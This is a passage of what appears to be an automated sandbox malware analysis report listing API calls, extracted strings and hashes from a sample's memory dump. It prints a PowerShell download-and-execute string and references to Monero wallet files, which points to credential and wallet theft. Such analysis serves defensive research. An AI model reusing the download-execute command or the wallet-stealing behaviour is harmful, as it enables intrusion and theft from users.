                                    • Instruction Fuzzy Hash: BC3164B290020897DB14FBB0DC85FEE737CAB98701F404989B715A7091EE74A78DCBA5
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00952D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00952D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00952CC4
                                    • <, xrefs: 00952D39
                                    • ')", xrefs: 00952CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 8071116be20139ea33d522b333c7f76899603bbf38da60a4351f52079f5d7c5a
                                    • Instruction ID: 72a6ed190e757eb76af4b02fe1f736549c90268fd2eb4951f56fbde672a24c76
                                    • Opcode Fuzzy Hash: 8071116be20139ea33d522b333c7f76899603bbf38da60a4351f52079f5d7c5a
                                    • Instruction Fuzzy Hash: 5341BF71C102089ADB14EFA1C892BDDBB78BF94301F404219F916A7191EF746A4ECF99
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00949F41
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 62faf944703c54f76b1a3b2dfe90e90b70067198c2c7d23e148942d941b51eae
                                    • Instruction ID: 7a1206747a8083820e70009e6e43c24797dbb96b28c1f5a649005efa38cd8fec
                                    • Opcode Fuzzy Hash: 62faf944703c54f76b1a3b2dfe90e90b70067198c2c7d23e148942d941b51eae
                                    • Instruction Fuzzy Hash: 3A615F70A00248DFDB24EFA5CC96FEE7779AF85304F008118F90A5F191EB746A4ACB56
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,015ED1F8,00000000,00020119,?), ref: 009540F4
                                    • RegQueryValueExA.ADVAPI32(?,015EDF10,00000000,00000000,00000000,000000FF), ref: 00954118
                                    • RegCloseKey.ADVAPI32(?), ref: 00954122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954147
                                    • lstrcat.KERNEL32(?,015EDE20), ref: 0095415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 2477c6f065ad15c8244c8e51633646b96535fcaefeb28ce8c0b436a5d5517e9f
                                    • Instruction ID: 6bb49f28af572fba63f2e3c0ec1c84173c2ec62812f82749bd0815cdbca50493
                                    • Opcode Fuzzy Hash: 2477c6f065ad15c8244c8e51633646b96535fcaefeb28ce8c0b436a5d5517e9f
                                    • Instruction Fuzzy Hash: A5418AB6D101086BEB14EBA0DC56FFE737DAB88300F008559B71657191EE755B8CCBA2
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 0095696C
                                    • sscanf.NTDLL ref: 00956999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009569B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009569C0
                                    • ExitProcess.KERNEL32 ref: 009569DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 9c482c0168f0659151cc4bb455c789106be8e9560f69240d1c06ccea599fd14f
                                    • Instruction ID: e74d823d2457101789c08a10f3a291a9803ed55dc5ad506a7de0303156fde582
                                    • Opcode Fuzzy Hash: 9c482c0168f0659151cc4bb455c789106be8e9560f69240d1c06ccea599fd14f
                                    • Instruction Fuzzy Hash: 6721FAB5D00209ABDF04EFE4D955AEEB7B9FF48301F04852EE506E3250EB345608CBA9
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB770,00000000,00020119,?), ref: 00957E5E
                                    • RegQueryValueExA.ADVAPI32(?,015ED3F8,00000000,00000000,000000FF,000000FF), ref: 00957E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00957E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: f0bf866f47819bf70edc87d35f8cbad2313d41be84b4ec0792013f3c06385bf3
                                    • Instruction ID: c21753fd7d68b89361adf605a1cea1c1637b0096e27aeab488edfa7c2dd4971d
                                    • Opcode Fuzzy Hash: f0bf866f47819bf70edc87d35f8cbad2313d41be84b4ec0792013f3c06385bf3
                                    • Instruction Fuzzy Hash: 97114FB1A44205EBE710CFD5ED4AF7BBBB8EB44711F10415AFA05A72A0DB785904CBA1
                                    APIs
                                    • StrStrA.SHLWAPI(015EDD48,?,?,?,0095140C,?,015EDD48,00000000), ref: 0095926C
                                    • lstrcpyn.KERNEL32(00B8AB88,015EDD48,015EDD48,?,0095140C,?,015EDD48), ref: 00959290
                                    • lstrlen.KERNEL32(?,?,0095140C,?,015EDD48), ref: 009592A7
                                    • wsprintfA.USER32 ref: 009592C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 701a66744233baa2b0c4b1a81af4105e23fb30bc6b3efab63370b3a7598e739a
                                    • Instruction ID: a085fcf767dbab2419cc47f04fa54459bcf8541e3db12ac857622a7bf348b247
                                    • Opcode Fuzzy Hash: 701a66744233baa2b0c4b1a81af4105e23fb30bc6b3efab63370b3a7598e739a
                                    • Instruction Fuzzy Hash: 1701DE75500208FFEB04DFECC984EAE7BB9EB48355F108549F9099B215CA35EE41DB91
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009412B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009412BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009412D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009412F5
                                    • RegCloseKey.ADVAPI32(?), ref: 009412FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 1bd674564feb5975785fa47b7362acaf5b93b393be4e795b547c0e40df65d39d
                                    • Instruction ID: 685c23ea30635811eb6e81ab45cf303ad788ad43975526b231c5d4a7dd4cb44f
                                    • Opcode Fuzzy Hash: 1bd674564feb5975785fa47b7362acaf5b93b393be4e795b547c0e40df65d39d
                                    • Instruction Fuzzy Hash: 180136B9A40208BBEB00DFD0DC49FAEB7BCEB48701F008155FA05D7290DA749A01DF51
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: String___crt$Type
                                    • String ID:
                                    • API String ID: 2109742289-3916222277
                                    • Opcode ID: 896b38440c6884984c25c4d8aade93c9ae919702cdb8d3c9443535245bc5ee7b
                                    • Instruction ID: 7e0c3a1068ee4e29fed40f56c5f1b8e43fb17a315d2c524e771a77982fc57d01
                                    • Opcode Fuzzy Hash: 896b38440c6884984c25c4d8aade93c9ae919702cdb8d3c9443535245bc5ee7b
                                    • Instruction Fuzzy Hash: A541E4B110079C5EDB21CB258C94BFBBBFC9F45706F1448A8ED8A86182E2719A48CF20
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00956663
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00956726
                                    • ExitProcess.KERNEL32 ref: 00956755
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                    • String ID: <
                                    • API String ID: 1148417306-4251816714
                                    • Opcode ID: ea71e24b37a4db5fe727b8da15bbce6ce14f106e9268ec914a77fc5ca5a0a0de
                                    • Instruction ID: 54095c878abab7723015acc909d90a290c16d65af58ac58489558abf65566e66
                                    • Opcode Fuzzy Hash: ea71e24b37a4db5fe727b8da15bbce6ce14f106e9268ec914a77fc5ca5a0a0de
                                    • Instruction Fuzzy Hash: F03129B1801218AADB14EB91DC92BDEB778AF84301F404289F709671A1DF746B48CF6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00960E28,00000000,?), ref: 0095882F
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958836
                                    • wsprintfA.USER32 ref: 00958850
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesslstrcpywsprintf
                                    • String ID: %dx%d
                                    • API String ID: 1695172769-2206825331
                                    • Opcode ID: 362d2b5886ec6a11d09fc0e9e56ef44c0a111363ecca2baaff0ceab883314645
                                    • Instruction ID: ff2d7f509664025ff7a3f7da2cb32a40873dc60332b0708a585ba696c16e9c0a
                                    • Opcode Fuzzy Hash: 362d2b5886ec6a11d09fc0e9e56ef44c0a111363ecca2baaff0ceab883314645
                                    • Instruction Fuzzy Hash: 4A2112B1A40204AFEB04DFD4DD45FAEBBB8FB48711F104519FA05A7290DB79A901CBA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0095951E,00000000), ref: 00958D5B
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00958D62
                                    • wsprintfW.USER32 ref: 00958D78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: a847d1f4ed9d48b49fd79e7278fd96d4a34fb56e30f45b960081b356fecac7b0
                                    • Instruction ID: e5c4a82ce885628cd06d205b52bea79ed893aab1f57038a3491b58bcd2ce009c
                                    • Opcode Fuzzy Hash: a847d1f4ed9d48b49fd79e7278fd96d4a34fb56e30f45b960081b356fecac7b0
                                    • Instruction Fuzzy Hash: 94E0ECB5A40208BBE710DB94DD4AE6977B8EB44702F004196FE0997290DE719E10DBA6
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094A2E1
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0094A3FF
                                    • lstrlen.KERNEL32(00000000), ref: 0094A6BC
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094A743
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 092b64280ed10f5a96d25d1b770497417be22d4b5cd18c801ff25bbf41aa65a7
                                    • Instruction ID: 183d71b44dfe2e92c4619b46c72f55a384b0e08eb7e35c94cbdb8087206ab178
                                    • Opcode Fuzzy Hash: 092b64280ed10f5a96d25d1b770497417be22d4b5cd18c801ff25bbf41aa65a7
                                    • Instruction Fuzzy Hash: CAE1EE728101189ADB05FBA5DC92FEE7338BF94301F508259F917760A1EF346A4DCB6A
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094D481
                                    • lstrlen.KERNEL32(00000000), ref: 0094D698
                                    • lstrlen.KERNEL32(00000000), ref: 0094D6AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094D72B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: bcbdc05d611f6e6f1567d9d87f482d2a85db6b021574f338ef89e47a47054d87
                                    • Instruction ID: d82a8655e56ada924608308451c000ce6018b3eddaef607872187acca83b5934
                                    • Opcode Fuzzy Hash: bcbdc05d611f6e6f1567d9d87f482d2a85db6b021574f338ef89e47a47054d87
                                    • Instruction Fuzzy Hash: 5091F1729101189ADB04FBA5DC96FEE7338BF94301F504259F917A70A1EF346A0DCB6A
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 00958B60: GetSystemTime.KERNEL32(00960E1A,015E9D28,009605AE,?,?,009413F9,?,0000001A,00960E1A,00000000,?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 00958B86
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0094D801
                                    • lstrlen.KERNEL32(00000000), ref: 0094D99F
                                    • lstrlen.KERNEL32(00000000), ref: 0094D9B3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0094DA32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 8b940297ec4e46b24da43576d8f2f23fa2874f9a6f4f2b1d2856c1f028906792
                                    • Instruction ID: c20ef73a9c86daacf69c7c1ed09864c9f00c483e3d36add7cf317908e96e8921
                                    • Opcode Fuzzy Hash: 8b940297ec4e46b24da43576d8f2f23fa2874f9a6f4f2b1d2856c1f028906792
                                    • Instruction Fuzzy Hash: 1681E0729101189ADB04FBA5DC96FEE7339BF94301F504619F907A70A1EF346A0DCB6A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                     • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
